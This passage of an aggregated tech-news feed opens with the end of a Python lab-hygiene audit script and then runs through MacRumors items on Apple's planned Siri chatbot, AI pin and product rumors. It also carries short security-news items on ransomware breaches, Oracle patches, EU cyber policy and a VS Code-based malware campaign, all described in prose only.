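def audit(inventory: list[dict], today: date) -> dict[str, list[str]]:
    """Map resource id -> findings, for every resource with at least one finding."""
    return {r["id"]: issues for r in inventory if (issues := check_resource(r, today))}


ADMIN_POLICY = {"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
SCOPED_POLICY = {"Statement": [{"Effect": "Allow",
                                "Action": ["s3:GetObject"],
                                "Resource": ["arn:aws:s3:::example-lab-bucket/*"]}]}

INVENTORY = [  # constructed records, not real hosts
    {"id": "i-lab-dvwa", "app": "DVWA", "public": True, "egress": "unrestricted",
     "default_credentials_changed": False, "iam_policies": [ADMIN_POLICY],
     "tags": {"environment": "training", "expires": "2025-12-31"}},
    {"id": "i-lab-juice", "app": "juice-shop", "public": False, "egress": "restricted",
     "default_credentials_changed": True, "iam_policies": [SCOPED_POLICY],
     "tags": {"environment": "demo", "owner": "appsec", "expires": "2026-03-31"}},
    {"id": "i-prod-web", "app": "storefront", "public": True,
     "iam_policies": [SCOPED_POLICY], "tags": {"environment": "production", "owner": "web"}},
]

if __name__ == "__main__":
    for rid, findings in audit(INVENTORY, date(2026, 1, 20)).items():
        print(rid)
        for finding in findings:
            print("  -", finding)
```

Run against the constructed inventory, the exposed DVWA host trips every control while the isolated, scoped, owned and dated Juice Shop host passes; the production record is skipped because this check is about lab hygiene. The `expires` tag is the piece most teams lack, and it is what makes “if it doesn’t have an end date, it will run forever” enforceable.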
Ultimately, he emphasized: “These are fixable problems. Basic hygiene … would have prevented every case we found.”
View the full article
Apple is apparently working on a Siri chatbot that will rival Claude, Gemini, and ChatGPT, and Apple is aiming to debut it in less than six months when iOS 27 is unveiled at WWDC. Bloomberg shared details on the chatbot earlier today, but there was one major question unanswered: what will Apple charge?
Anthropic, Google, OpenAI, and other companies that run major chatbots offer a free version, but it's often throttled and a paid subscription is required for full functionality. Apple is reportedly planning to integrate its Siri chatbot deeply into iOS, iPadOS, and macOS instead of offering a standalone app. A ‌Siri‌ chatbot available on billions of devices is going to be expensive to run, but ‌Siri‌ is also so core to Apple products that people aren't going to want to pay for what's always been free.

What the Siri Chatbot Can Do

Per Bloomberg, the ‌Siri‌ chatbot will be able to "search the web for information, create content, generate images, summarize information and analyze uploaded files." It will also be able to control Apple devices and use personal data and on-screen information for search and to complete tasks. That sounds like just about everything that existing chatbots like ChatGPT can do, plus Apple is integrating the chatbot into all of its apps.

On-Device Siri Chatbot?

Some of those tasks can be completed on-device using the powerful A-series and M-series chips Apple has been building into its products, but Apple is using a custom AI model developed with the Google Gemini team. According to Bloomberg, the model is roughly comparable to Gemini 3, and the full version of Gemini 3 can't run on a high-end Mac, let alone a mobile device.

Apple is going to need servers to run the ‌Siri‌ chatbot, and while it has been building Private Cloud Compute servers for AI features, it's unlikely that it has enough for a ‌Siri‌ chatbot. Bloomberg suggests that Apple is actually discussing running its chatbot on Google servers, and Google isn't going to do that for free.

Compute Costs and Infrastructure

Whether Apple is using its own private cloud compute servers or Google's Tensor servers, it needs serious compute power. Every question ‌Siri‌ is asked and every image ‌Siri‌ generates will cost Apple.

OpenAI is not profitable, and it spends billions on inference each year. OpenAI has committed to spending $1.4 trillion on infrastructure to keep up with demand, an amount of money that it doesn't have yet. Google spent $85 billion on infrastructure to meet AI demand in 2025. In August, Google said that the median Gemini Apps text prompt uses 0.24 watt-hours of energy. At scale, across all Google devices and all Google products, that's hundreds of millions of dollars per year just in electricity costs.

How Gemini is Priced

Google has already integrated Gemini into its Pixel smartphones and other Android devices. It has a split tier system that Apple might adopt.

Android users have access to a free version of Gemini that costs Google less to run. It can answer questions, summarize text, write emails, and control apps and smartphone features. Android users have to pay $20 per month for Gemini Advanced to get access to the more advanced version of Gemini that offers better reasoning, longer context for analyzing bigger documents, and improved coding.

Apple could do something similar, offering a basic version of ‌Siri‌ that's accessible to everyone, with more advanced models available with a subscription. iCloud already provides a model for a free/paid product split. Apple offers all Apple users 5GB of cloud storage for free, but anything more will cost you.

Temporarily Free?

Apple could make its ‌Siri‌ chatbot free to use to begin with, which would lure users who are paying for other services like ChatGPT. ChatGPT, Claude, and Gemini are all around $20 per month, so Apple eating ‌Siri‌ chatbot costs for a year or two would be hard to compete with. Even undercutting current prices would likely lure customers and make Apple an immediate key player in the AI market.

Right now, Apple Intelligence is entirely free to use even for images generated with Image Playground, but the capabilities are limited and some functionality runs on-device.

Possible Cost

Apple might not be able to absorb AI costs, and there could be paid options right when the ‌Siri‌ chatbot launches. If that's the case, pricing will likely be competitive with existing chatbots.

AI companies have decided entry-level plans should cost $20/month, but it's not clear if that price point is actually sustainable with the growing costs of training new models and supporting more users.

ChatGPT Plus - $20/month
Copilot Pro - $20/month
Gemini Advanced - $19.99/month
Claude Pro - $20/month
Perplexity Pro - $20/month

Siri ChatGPT Integration

Right now, Apple has a partnership with OpenAI to hand complex requests off to ChatGPT. Apple doesn't pay OpenAI for this feature, but it does put ChatGPT in front of millions of Apple users. When Apple launches its ‌Siri‌ chatbot, ChatGPT integration could be removed.

Eliminating the ChatGPT integration might also impact Apple's legal battle with Elon Musk. Musk's xAI company sued Apple and OpenAI for colluding to promote ChatGPT over other AI bots like Grok, arguing that Apple should let other chatbots integrate with ‌Siri‌.

If Apple stops offering ChatGPT through ‌Siri‌ in favor of its own ‌Siri‌ chatbot, it would be no different than Google integrating Gemini into all Android devices, or Meta limiting its smart glasses to Meta AI.

Launch Timing

We'll probably be hearing more about the ‌Siri‌ chatbot in the coming months. Apple is aiming to unveil the functionality in iOS 27, iPadOS 27, and macOS 27, which will be previewed in June at WWDC.
This article, "Will Apple Charge for Its Siri Chatbot?" first appeared on MacRumors.com


View the full article
Apple is working on a small, wearable AI pin equipped with multiple cameras, a speaker, and microphones, reports The Information. If it actually launches, the AI pin will likely run the new Siri chatbot that Apple plans to unveil in iOS 27.
The pin is said to be similar in size to an AirTag, with a thin, flat, circular disc shape. It has an aluminum and glass shell, and two cameras at the front. There is a standard lens and a wide-angle lens that are meant to capture photos and videos, while three microphones are designed to pick up sound around the wearer. An included speaker allows the pin to play audio, and there is a physical control button along one edge. The device is able to wirelessly charge like an Apple Watch.

Apple wants the final version of the pin to be about the same size as an ‌AirTag‌, but it will be slightly thicker. Currently, there is no built-in attachment method, but that could change later in development.

The Information says it is not clear if Apple plans to sell the pin on its own or bundle it with future smart glasses or other devices, but the physical button and built-in cameras, speakers, and microphones suggest that it can operate independently.

AI pins and wearables have not fared well so far, but multiple companies are developing AI wearables. OpenAI is teaming up with Jony Ive for some kind of small AI device that may or may not be wearable, and it has multiple other AI products in the works. Meta has AI glasses, and Amazon has the Bee bracelet. Dozens of other small companies have created small, AI-integrated wearables and devices, which means Apple needs to keep pace.

Apple's AI pin could be released as soon as 2027, but The Information cautions that development is in the early stages and could be canceled.
This article, "Apple Developing AirTag-Sized AI Pin With Dual Cameras" first appeared on MacRumors.com


View the full article
While the first few weeks of 2026 have been relatively slow for Apple, things should start to pick up soon. Apple Creator Studio launches next week, and there are a handful of other items on the company's agenda over the next month.
Below, we have listed key Apple dates to watch through February:
Wednesday, January 28: Apple Creator Studio launches. The all-in-one subscription bundle provides access to the Final Cut Pro, Logic Pro, Pixelmator Pro, Motion, Compressor, and MainStage apps, along with premium content across the Final Cut Pro, Pixelmator Pro, Numbers, Pages, Keynote, and Freeform apps. In the U.S., pricing is set at $12.99 per month or $129 per year.
Thursday, January 29: Apple will report its earnings results for the first quarter of its 2026 fiscal year, which encompasses the holiday shopping season. Apple updated the iPad Pro, MacBook Pro, and Vision Pro with the M5 chip during the quarter. Apple's CEO Tim Cook and CFO Kevan Parekh will discuss the results on a conference call at 5 p.m. Eastern Time. You can listen live on Apple's website.
Thursday, February 5: Another four games are coming to Apple Arcade, including Retrocade, which lets you play classic arcade games like Asteroids, PAC-MAN, Breakout, Galaga, and Space Invaders. One of the other additions will be an arcade version of the popular PC game Sid Meier's Civilization VII.
Friday, February 6: Apple will accept submissions for the 2026 Swift Student Challenge from Friday, February 6 through Saturday, February 28. Some of the winners will be invited to spend three days at Apple Park during WWDC 2026 in June.
Sunday, February 8: Apple Music is the official sponsor of the Super Bowl LX Halftime Show, which will be held on Sunday, February 8. This year's performer is Puerto Rican rapper and singer Bad Bunny.
Tuesday, February 10: A few years ago, Apple's Home app was rearchitected, and the company will be ending support for the original architecture on this day. If you do not update, Apple warns you might experience issues.
Tuesday, February 24: Apple will be holding its annual shareholders meeting at 8 a.m. Pacific Time, and it will once again be held virtually. Apple shareholders of record as of January 2, 2026 can vote to re-elect the company's board of directors, ask questions, and more. Apple rarely answers any questions about future plans, so the meetings are often unremarkable from a news perspective.
These are only the dates that we know about, and there could be new product announcements and more over the coming weeks. Stay tuned!
This article, "Mark Your Calendar: Apple's Key Dates to Watch Over the Next Month" first appeared on MacRumors.com

View the full article
Apple plans to turn Siri into a chatbot that will rival Anthropic's Claude, Google's Gemini, and OpenAI's ChatGPT, reports Bloomberg. Apple did not initially plan to introduce a chatbot, but their popularity forced Apple executives to reconsider.


Codenamed Campos, the ‌Siri‌ chatbot will be integrated into iOS 27, iPadOS 27, and macOS 27, replacing the current version of ‌Siri‌. It will have the same natural language conversation functionality as chatbots like ChatGPT, and it will be accessible by using the "‌Siri‌" wake word or by holding down the side button on an iPhone or iPad.

Apple is testing the ‌Siri‌ chatbot as a standalone app, but it won't be offered in app form. Instead, it will be built directly into Apple devices. Apple plans to power the chatbot with a custom model based on Google Gemini.

Apple's chatbot will be able to search the web, generate content like images, help with coding, summarize information, and analyze uploaded files. It will be able to use personal data on a person's device to complete tasks, and it will result in a much improved search feature. Apple is also designing a feature that will let the ‌Siri‌ chatbot view open windows and on-screen content, as well as adjust device features and settings.

‌Siri‌ will integrate into all Apple apps, including Photos, Mail, Messages, Music, and TV, and it will be able to access and analyze content in the apps to respond to queries and requests.

Apple is considering how much the ‌Siri‌ chatbot will remember. Claude and ChatGPT are able to glean information about users from past conversations for personalization purposes, but Apple may limit ‌Siri‌'s memory for privacy purposes.

The ‌Siri‌ chatbot will be an upgrade to the more personalized version of ‌Siri‌ that Apple plans to roll out in iOS 26.4. With iOS 26.4, Apple will make ‌Siri‌ more capable, implementing the Apple Intelligence features that it initially promised in iOS 18. The much more powerful chatbot version of ‌Siri‌ will follow later in the year, in iOS 27 and its sister updates.

Apple currently plans to unveil ‌Siri‌ chatbot at the Worldwide Developers Conference in June, after which testing of iOS 27 will begin.

The ‌Siri‌ chatbot will be the key new feature in iOS 27, iPadOS 27, and macOS 27, with Apple otherwise focusing on fixing bugs and improving performance.
This article, "A Siri Chatbot is Coming in iOS 27" first appeared on MacRumors.com

View the full article
In July 2025, Ingram Micro suffered devastating consequences from a ransomware attack in which the IT distributor's logistics were paralyzed for a week.
It has now emerged that sensitive data was also leaked. As Ingram Micro confirmed in a mandatory filing with US authorities, more than 42,000 people are affected. The perpetrators reportedly obtained information from current and former employees as well as job applicants.
In addition to basic personal data such as names and contact information, birth dates, ID numbers, and Social Security numbers were also disclosed. Furthermore, documents from application processes and employee evaluations were stolen. The IT distributor employs approximately 23,500 people worldwide.
Shortly after the attack became public, the ransomware gang Safepay announced it had stolen 3.5 terabytes of data from Ingram Micro. The group emerged in September 2024 and is now one of the most active cyber gangs.
View the full article
Oracle has handed security teams their first big patching workload of the year, with its latest quarterly update containing a hefty 337 security fixes across its product range, including 27 rated critical.
This imposing number of patches won’t surprise anyone whose job it is to look after Oracle products; in 2025 the company averaged 344 per update, so 337 is in line with this.
The first job with large updates like this is working out where to start and what to prioritize. That usually means assessing the flaws in core products while paying careful attention to severity.
In terms of the latter, the good news is that, as far as Oracle knows, none of January’s vulnerabilities is being exploited in the wild. That means there are no zero days to worry about this time.
There is no guarantee this won’t change, which is why security teams will pay closest attention to the 27 patches that map to 13 CVEs with a critical rating.
There was a time when updates were about fixing flaws in proprietary code. Those days are long gone; a significant portion of the January update deals with issues affecting third-party code such as open source libraries used by Oracle inside its products.
That’s also why individual CVEs now often generate multiple patches across different products, which can make assessing what to fix more demanding.
A high-priority example of this is CVE-2026-21962 affecting the Oracle HTTP Server and Oracle Weblogic Server Proxy Plug-in. Given a maximum CVSS score of 10, this critical severity vulnerability is addressed by seven different patches, depending on which product contains the vulnerable code.
CVE bloat
Also confusing is the fact that some CVEs listed in the latest update relate to CVEs from previous quarterly updates. A notable example of this is CVE-2025-66516, rated 9.8 (critical) on CVSS, affecting Oracle Middleware Common Libraries and Tools, which has a precursor in CVE-2025-54988. It addresses the high-profile Apache Tika issue first discovered in August, whose scope was expanded to cover more components in December.
This phenomenon of CVE bloat applies to around 50 of the vulnerabilities in the January update, in some cases with a single new CVE referring to multiple older CVEs.
As for products, the biggest offender, with 56 patches to be applied, is the Zero Data Loss Recovery Appliance (ZDLRA); almost all are fixes for third-party components. Despite 34 of these being described as remotely exploitable, only one has a new CVE identifier, CVE-2026-21977, which is rated 3.1 (low) on CVSS.
For anyone applying patches, this nuance is important; a product might only have one new CVE behind which lie multiple others identified in CVEs from other vendors.
Just behind ZDLRA in patch volume are Oracle Enterprise Manager, with 51 patches, 47 of which can be remotely exploited without authentication, and Oracle E-Business Suite, with 38 patches, 33 of which are remotely exploitable.
Despite Oracle’s comprehensive patching cycle, the company’s approach to security has not always been effective. In 2025, a threat actor claimed to have stolen six million records from a vulnerable Oracle server, a claim the company repeatedly denied.
Security company CloudSEK later identified the vulnerability that led to the alleged hack as being CVE-2021-35587, an old issue that should have been patched. Presumably coincidentally, in August it was announced that long-serving chief security officer Mary Ann Davidson was leaving the company.
View the full article
Apple hasn't developed an AI chatbot for consumers, but it has been using them internally for some time now. Last year, Bloomberg's Mark Gurman detailed a Veritas chatbot to test the new version of Siri, and now Macworld has shared details on two other AI tools that Apple employees are allegedly using.


Enchanté is apparently a chatbot that rolled out to employees in November 2025, and it is an "internal ChatGPT-like assistant" that Apple workers can use for "ideas, development, proofreading, and even general knowledge answers."

The tool is said to look similar to the ChatGPT app for macOS, and it runs models approved by Apple. It is run locally or on private servers, and it incorporates Apple Foundation Models, Claude, and Gemini. Employees can upload documents, images, and files for analysis, and the app can access files stored on a Mac.

Apple encourages employees to use Enchanté as a test platform and for everyday work tasks, because it incorporates Apple internal documentation and guidelines.

The second AI tool that Apple developed is called Enterprise Assistant, and it is designed to be a knowledge hub for corporate employees. Macworld says that it has a database of Apple internal policies, so workers can ask questions about everything from company conduct guidelines to health insurance benefits.

It's no surprise that Apple is using AI tools internally, and there have been reports about Apple testing different AI features and platforms since 2023. In 2024, for example, Apple tested a ChatGPT-like generative AI tool that allows AppleCare employees to speed up technical support.

Apple hasn't rolled out consumer-facing chatbot features as of yet, but it has tested a Support Assistant in the Apple Support app. The Support Assistant uses natural language to provide users with help solving issues with Apple devices.

Later this year, Apple plans to introduce an overhauled version of ‌Siri‌ that's powered by Google Gemini, and it will also incorporate chatbot features.
This article, "Apple Employees Using 'Enchanté' Internal AI Chatbot to Speed Up Work" first appeared on MacRumors.com

View the full article
In addition to updating many of its existing products, Apple is expected to unveil five all-new products this year, including a smart home hub, a Face ID doorbell, a MacBook with an A18 Pro chip, a foldable iPhone, and augmented reality glasses.


Below, we have recapped rumored features for each product.

Smart Home Hub

Apple home hub (concept)
Apple's long-rumored smart home hub should be released this year, according to rumors. The device was originally expected to be unveiled last year, but the launch was reportedly postponed until the more personalized version of Siri is ready.

The home hub is rumored to feature a 6-inch to 7-inch square display, and an A18 chip for Apple Intelligence support. The device can reportedly be attached to a speaker base, or mounted on a wall, and it would allow users to control smart home accessories, make FaceTime video calls, and more. It might even double as a home security system.

Smart Doorbell


In December 2024, Bloomberg's Mark Gurman reported that Apple was in the early stages of developing a smart home doorbell and lock system with Face ID. He said the doorbell would wirelessly connect to a compatible deadbolt lock.

Gurman said Apple's doorbell would launch in 2026 at the earliest, so it could be unveiled this year if that timeframe remains accurate.

Apple would surely tout the privacy and security benefits of its own smart home doorbell. Apple already offers a HomeKit Secure Video service with end-to-end encryption for storing footage in iCloud, and the doorbell could have a Secure Enclave.

The doorbell would be one of several new smart home products that Apple is reportedly planning, with the others being the aforementioned smart home hub and an Apple-branded HomeKit-enabled indoor camera. This would add to a lineup of home products that already includes the Apple TV, HomePod, and HomePod mini.

MacBook With A18 Pro Chip


Apple plans to release a lower-priced MacBook with a version of the iPhone 16 Pro's A18 Pro chip this year, according to several reports and leakers. This would be an all-new model positioned below the MacBook Air in the Mac lineup.

Apple supply chain analyst Ming-Chi Kuo was first to reveal that Apple is allegedly planning a more affordable MacBook. Last year, he said the laptop would have around a 13-inch display and come in silver, blue, pink, and yellow finishes. A few rumors have specifically mentioned that it will have a 12.9-inch display.

The lower-cost MacBook could have a lot in common with the discontinued 12-inch MacBook, including an ultra-thin and lightweight design. However, that model was powered by Intel processors. Apple stopped selling the 12-inch MacBook in July 2019, so there has been a long wait for a similar model powered by Apple silicon.

In the iPhone 16 Pro, the A18 Pro chip has a 6-core CPU and a 6-core GPU. The chip's performance is similar to the M1 chip, so this new MacBook could effectively be a replacement for the old MacBook Air with the M1 chip, which Apple still sells through Walmart for $599. The new MacBook would likely start at $699 or $799.

With the A18 Pro chip, the lower-cost MacBook might have only 8GB of RAM, whereas all current MacBook Air and MacBook Pro models start with at least 16GB of RAM. The chip also lacks Thunderbolt support, so the new MacBook would likely be equipped with regular USB-C ports, with slower data transfer speeds and external display limitations.

Foldable iPhone

A foldable iPhone (concept)
Following years of rumors, Apple is expected to release its long-awaited foldable iPhone in September, alongside the iPhone 18 Pro and iPhone 18 Pro Max. Like Samsung's Galaxy Z Fold 7, the device will open up like a book, providing users with a large screen for watching videos, playing games, and multitasking.

The foldable iPhone will be equipped with a 7.7-inch inner display, and a 5.3-inch outer display, according to the latest report. The device will apparently have a virtually "crease-free" inner display supplied by Samsung.

Kuo expects the foldable iPhone to have two rear cameras, one front camera, and a Touch ID power button instead of Face ID.

This will undoubtedly be Apple's most expensive iPhone ever.

Augmented Reality Glasses

Meta Ray-Ban smart glasses
Apple reportedly plans to unveil augmented reality smart glasses as early as this year, although they might not begin shipping to customers until 2027.

Apple's glasses would compete with the Meta Ray-Bans, which now offer an in-lens display.

Apple's first smart glasses will reportedly have speakers for music playback, cameras for photos and video, voice control, and potentially health features, but an in-lens display is not expected until at least the second generation.
Tags: Apple Doorbell, Apple Glasses, Apple Smart Home Display, Foldable iPhone, MacBook (A18 Pro)
This article, "Apple Expected to Unveil Five All-New Products This Year" first appeared on MacRumors.com

View the full article
Volvo's new EX60 mid-size electric SUV is set to be the first Volvo vehicle that comes with an Apple Music app pre-installed, Volvo said today. The vehicle will be equipped with ‌Apple Music‌ with Dolby Atmos, providing an immersive Spatial Audio experience.


‌Apple Music‌ will be available as an app accessible through the vehicle's built-in infotainment system, making it available for those who do not use CarPlay. Using the app requires an ‌Apple Music‌ subscription.

Volvo is equipping the EX60 with its HuginCore system that integrates AI and technology developed by Google, Nvidia, and Qualcomm. Gemini is deeply integrated in the vehicle, allowing the car to be controlled with natural language commands.

While the EX60 has deep Google Gemini integration, it continues to support ‌CarPlay‌. Volvo says that Wireless Apple ‌CarPlay‌ comes standard on the EX60, with users able to connect their iPhone to the car's infotainment system to access Apple apps, music, and navigation.

The EX60 also includes digital key plus, so it can be unlocked and turned on with an ‌iPhone‌ or Apple Watch.

Volvo is selling the EX60 in European markets starting now, and US availability will follow in the spring. Orders will be delivered starting in summer.
Tag: Apple Music
This article, "Volvo's New EX60 SUV Features Pre-Installed Apple Music App With Spatial Audio" first appeared on MacRumors.com

View the full article
The Apple supplier subject to a major cyberattack last month was China's Luxshare, it has now emerged. More than 1TB of confidential Apple information was reportedly stolen.


It was reported in December that one of Apple's assemblers suffered a significant cyberattack that may have compromised sensitive production-line information and manufacturing data linked to Apple. The specific company targeted, the scope of the breach, and its operational impact were unclear until now.

The attack was first revealed on RansomHub's dark web leak site on December 15, 2025, where the group claimed it had encrypted internal Luxshare systems and exfiltrated large volumes of confidential data belonging to the company and its customers. The attackers warned that the information would be publicly released unless Luxshare contacted them to negotiate, and accused the company of attempting to conceal the incident.

According to the attackers' claims, the exfiltrated material includes vital files such as detailed 3D CAD product models and high-precision geometric files, 2D manufacturing drawings, mechanical component designs, circuit board layouts, and internal engineering PDFs. The group added that the large archives include Apple product data as well as information belonging to Nvidia, LG, Tesla, Geely, and other major clients.

The attackers subsequently wrote that Luxshare management had been given time to respond but had failed to do so, and that the stolen archives contained confidential project documentation protected under non-disclosure agreements. The post was accompanied by data samples that the group said were provided as proof of compromise.

Cybernews reported that its research team reviewed portions of the leaked sample data attached to the post and found what appeared to be legitimate internal Luxshare documentation tied to Apple projects. The materials explain confidential repair procedures and logistics workflows between Apple and Luxshare, including detailed process descriptions, timelines, and partner coordination documents.

Files commonly used in product design and manufacturing workflows, such as .dwg and Gerber files, were present in the samples reviewed. The projects referenced in the samples span a period from 2019 through to 2025. As such, it seems likely that unreleased products may be included. The researchers also said the sample data appears to include personally identifiable information of individuals involved in Apple projects, such as full names, job titles, and work email addresses.

Access to detailed engineering designs and manufacturing documentation could pose risks if they are misused, such as product reverse engineering, counterfeit manufacturing, and targeted attacks on hardware or firmware facilitated by detailed knowledge of device layouts and component interactions. Exposure of employee contact information and internal workflows could also increase the risk of targeted phishing or follow-on intrusions against Apple's other partners. Neither Apple nor Luxshare has confirmed the cyberattack.
Tags: Cybersecurity, Luxshare
This article, "Apple's Secret Product Plans Stolen in Luxshare Cyberattack" first appeared on MacRumors.com

View the full article
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findings
View the full article
Zoom and GitLab have released security updates to resolve a number of security vulnerabilities that could result in denial-of-service (DoS) and remote code execution. The most severe of the lot is a critical security flaw impacting Zoom Node Multimedia Routers (MMRs) that could permit a meeting participant to conduct remote code execution attacks. The vulnerability, tracked as CVE-2026-22844
View the full article
Satechi recently kicked off a new sale that has its most popular desktop accessories at 20 percent off for a limited time. To get this discount, enter the code REFRESH20 at checkout on the accessories found in Satechi's "Dark Refresh Collection."

Note: MacRumors is an affiliate partner with Satechi. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

This sale includes products like Qi2 wireless chargers, Bluetooth keyboards, USB-C hubs, Thunderbolt accessories, and more. Satechi provides free shipping on orders with a value that exceeds $20, so many of the products in this sale should automatically net you the free shipping bonus.


Additionally, Satechi announced a few products at CES earlier this month, and to mark the launch it's providing a 20 percent discount on these devices for early adopters. You can use the code CES2026 at checkout to get 20 percent off all five of Satechi's newest products.


Satechi's new CES 2026 products include two wireless keyboards, a wireless mouse, Thunderbolt 5 cable, and Thunderbolt 5 CubeDock with SSD Enclosure. All items in this sale are available to purchase and ship now, with the exception of the Thunderbolt 5 CubeDock, which is up for pre-order with an estimated shipping date of late March.

Finally, Satechi is hosting a "last chance" sale this week, with up to 30 percent off accessories with a limited supply remaining. In this sale you'll find discounts on MagSafe-compatible wireless charging pads, Thunderbolt docks, and more.

2026 Refresh Sale

Use Code REFRESH20 to see the below deals applied at checkout.

2-in-1 Foldable Qi2 Wireless Charging Stand - $64.00, down from $79.99
Mac Mini Stand and Hub with SSD Enclosure - $80.00, down from $99.99
Slim SM3 Mechanical Backlit Bluetooth Keyboard - $96.00, down from $119.99
3-in-1 Foldable Qi2 Wireless Charging Stand - $104.00, down from $129.99
Qi2 Trio Wireless Charging Pad - $104.00, down from $129.99
200W USB-C 6-Port GaN Hub - $120.00, down from $149.99
Thunderbolt 4 Slim Hub Pro - $160.00, down from $199.99

CES 2026 Sale

Use Code CES2026 to see the below deals applied at checkout.
Slim EX Wireless Mouse - $24.00, down from $29.99
Thunderbolt 5 Pro Cable - $32.00, down from $39.99
Slim EX1 Wireless Keyboard - $40.00, down from $49.99
Slim EX3 Wireless Keyboard - $56.00, down from $69.99
Thunderbolt 5 CubeDock - $320.00 (pre-order), down from $399.99

Last Chance Sale

All deals have been applied automatically and do not require a coupon code.

2-in-1 Headphone Stand with Wireless Charger - $55.99, down from $79.99
USB-C Monitor Stand Hub XL - $69.99, down from $149.99
Pro Hub Max - $69.99, down from $99.99
Duo Wireless Charger Power Stand - $69.99, down from $99.99
Trio Wireless Charger with Magnetic Pad - $83.99, down from $119.99
Thunderbolt 4 Dock - $199.99, down from $299.99

Related Roundup: Apple Deals
This article, "Refresh Your Workspace for 2026 With 20% Off Satechi's Best Desktop Accessories" first appeared on MacRumors.com

View the full article
The European Commission has presented a new cybersecurity package to strengthen the European Union’s resilience to increasing cyber and hybrid attacks from state and criminal actors.
The key is to reduce risks from high-risk suppliers outside the EU, especially in critical infrastructure such as mobile networks, through a common and risk-based framework. The Commission’s news release did not mention any specific suppliers targeted by the measures.
The move should make it possible to reduce the risk to sensitive parts of the EU’s IT ecosystem based on previous work on 5G security.
An updated European Cybersecurity Certification Framework (ECCF) will also make it faster and easier to security-test products and services. The package also simplifies compliance with existing cybersecurity rules to reduce the administrative burden, especially for small and medium-sized enterprises.
At the same time, the EU’s cybersecurity agency, ENISA, will be strengthened, among other things by giving it a more central role in threat analysis, incident response, vulnerability management, and coordination within the EU.
The package of measures needs to be approved by the European Parliament and the EU Council of Ministers. Member states will then have one year to implement the changes in their national legislation.
View the full article
Apple's iPhone 18 will feature a significantly brighter display, according to a Chinese leaker.


In a new post on Weibo, the user known as "Instant Digital" said that Chinese supplier BOE has little hope of making panels for the ‌iPhone 18‌ because Apple's brightness requirements for the next-generation device are unprecedentedly high. This suggests that the ‌iPhone 18‌'s display will see a considerable leap forward in terms of brightness.

The iPhone 13 and ‌iPhone‌ 14 offered a typical maximum brightness of 800 nits, with peak HDR brightness of 1,200 nits. With the ‌iPhone‌ 15, iPhone 16, and iPhone 17 Apple increased this to 1,000 nits typical maximum brightness and 1,600 nits peak HDR brightness. The ‌iPhone 17‌ also saw a notable increase from 2,000 nits of outdoor peak brightness to 3,000 nits.

Earlier today, Korea's The Elec reported that BOE is again struggling with ‌iPhone‌ OLED production, causing millions of panel orders to be shifted to Samsung Display.

The ‌iPhone 18‌ is expected to launch in early 2027, featuring the A20 chip, the C2 modem, and a simpler Camera Control.
Related Roundup: iPhone 18
Tags: BOE, Instant Digital
Related Forum: iPhone
This article, "iPhone 18 Rumored to Feature Much Brighter Display" first appeared on MacRumors.com

View the full article
Across this series, we’ve looked at how threat detection evolves when AI becomes part of SOC operations, from anomaly detection to triage to detection engineering. The final challenge is not design. It’s operation.

Deploying AI-driven detection is relatively easy. Sustaining it across analysts, shifts, environments, and time is where most SOCs struggle.
 
At scale, AI becomes an operational dependency. And dependencies require ownership.
View the full article
Apple has beaten a class action's claims alleging that it records users' mobile activity without their consent despite the company's privacy assurances, reports Bloomberg Law.


Filed in November 2022, the lawsuit accused Apple of "utterly false" assurances that users are in control of what information they share when they use stock ‌iPhone‌ apps like the App Store and Apple Music.

Specifically, it claimed that Apple's mobile device options to disable the sharing of device analytics and opting out of settings such as "Allow Apps to Request to Track" do nothing to stop Apple from continuing to collect data relating to users' browsing and activity for monetization purposes.

From the Bloomberg report:
This week's ruling only dismissed the California-specific privacy claims. Several other claims in the lawsuit already survived an earlier ruling in September 2024 and remain active.

Those claims – based on the "Share Device Analytics" setting – include breach of contract, unjust enrichment, and violations of consumer protection laws in Illinois, New Jersey, and New York. Judge Davila found that the plaintiffs had sufficiently argued they withdrew consent to data collection by turning off that setting.
Tags: Apple Privacy, Apple Lawsuits
This article, "Apple Defeats Privacy Law Claims in California Data Tracking Suit" first appeared on MacRumors.com

View the full article
OpenAI is "on track" to unveil its first AI device in the second half of this year, Axios reported this week.


The comment was given to the publication by OpenAI's chief global affairs officer Chris Lehane, who listed "devices" as one of the big coming attractions for the company in 2026.

Lehane didn't go into specifics about the upcoming product, which is being designed by former Apple design chief Jony Ive's oi Products team. Ive's startup officially merged with OpenAI last year after it was acquired for $6.5 billion.

Previous leaks have suggested that the company's first ChatGPT-powered gadget will be pocket-sized, contextually aware of your surroundings and life, and completely screen-free. Details that emerged in court filings last year suggested it would not be a wearable, but an alleged supply chain leak this week points to OpenAI's development of two pill-shaped gadgets that rest behind the ear and go by the codename "Sweetpea."

According to the leaker known as Smart Pikachu, the devices will be metallic and feature a custom 2nm chip to "replace iPhone actions by commanding Siri," suggesting some functional overlap with AirPods. The back-of-the-ear modules are also believed to feature sensors for environmental or contextual awareness, and are stored inside an egg-shaped case.

OpenAI is said to be considering launching several AI products over the next few years, potentially including a pen and a "home-style device." The leak could therefore relate to a different product to the one that OpenAI launches first. That said, Smart Pikachu claims Ive's team is prioritizing the behind-the-ear wearable, which is reportedly being manufactured by Foxconn and could launch as soon as September, so we'll have to wait and see.

Speaking to Axios, Lehane didn't commit to OpenAI's first device actually going on sale this year, but said the company was "looking at something in the latter part [of 2026]."
Tags: Jony Ive, OpenAI, Smart Pikachu
This article, "OpenAI on Track to Unveil First AI Device This Year, Could Rival AirPods" first appeared on MacRumors.com

View the full article
Threat actors behind the long-running Contagious Interview campaign were seen expanding from traditional social-engineering lures to the abuse of Microsoft Visual Studio Code (VS Code) as an execution and persistence mechanism.
According to new findings from Jamf Threat Labs, the actors are embedding malicious logic directly into VS Code project configurations, allowing code to execute as soon as a victim opens a repository and grants it “trust”.
Rather than relying on standalone malware or exploit chains, the campaign now leans on trusted developer workflows. Victims are lured to clone Git repositories, often under the guise of interview assignments or shared projects. Once opened in VS Code, weaponized configuration files automatically trigger commands that fetch and execute malicious JavaScript payloads.
Instead of targeting operating systems or browsers directly, the DPRK-linked actors are embedding themselves inside an IDE that developers use every day, which reduces friction, evades suspicion, and gives them stealth within trusted environments.
Weaponized VS Code for a persistent backdoor
